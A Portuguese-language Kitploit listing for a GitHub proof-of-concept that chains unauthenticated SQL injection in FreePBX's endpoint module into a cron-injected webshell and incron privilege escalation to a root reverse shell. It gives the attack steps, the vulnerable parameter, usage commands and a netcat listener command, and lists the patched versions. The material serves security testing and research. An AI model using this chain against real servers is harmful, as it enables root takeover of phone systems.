Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-57819-FreePBX-RCE2Root — Cadeia completa de PoC para CVE-2025-57819 no FreePBX 15, 16 e 17: SQLi não autenticado para RCE e controle total do root. | Kitploit
Ferramentas/GitHubGitHub/ozcanpng/cve-2025-57819-freepbx-rce2root
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubozcanpng/cve-2025-57819-freepbx-rce2root

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-57819-FreePBX-RCE2Root

Cadeia completa de PoC para CVE-2025-57819 no FreePBX 15, 16 e 17: SQLi não autenticado para RCE e controle total do root.

Ver Repositório
1há 2 mesesAinda não revisado

CVE-2025-57819 — Injeção SQL no FreePBX → RCE → Root

PoC de cadeia completa para CVE-2025-57819. Injeção SQL baseada em erro não autenticada no módulo endpoint do FreePBX que encadeia em um shell root via injeção de cron job e escalonamento de privilégio incron.

Apenas para testes autorizados e pesquisa. Não utilize contra sistemas que não lhe pertencem.


O que faz

root@kitploit:~
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
  1. Extrai informações do banco de dados via injeção baseada em erro em /admin/ajax.php
  2. Injeta um cron job que escreve um webshell PHP na raiz web
  3. Aguarda a execução do cron (~60s), confirma RCE como asterisk
  4. Cria um arquivo de gatilho incron que dispara o hook fwconsole como root
  5. Captura o reverse shell no seu listener

Configuração

root@kitploit:~
git clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt

Uso

root@kitploit:~
python3 CVE-2025-57819.py <target> <lhost> <lport> [--cleanup]

Inicie um listener primeiro:

root@kitploit:~
nc -lvnp 9999

Então execute:

root@kitploit:~
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999

--cleanup remove o webshell e o cron job após a exploração.


Afetados

FreePBX com o módulo endpoint instalado. O parâmetro brand em /admin/ajax.php é passado sem sanitização para uma consulta SQL.

FreePBXVersão Corrigida
15.x15.0.66
16.x16.0.89
17.x17.0.3

Referências

  • FreePBX Security Advisory GHSA-m42g-xg4c-5f3h
  • NVD — CVE-2025-57819

Autor

ozcanpng — github.com/ozcanpng — ozcanpng.dev

Baixar ferramenta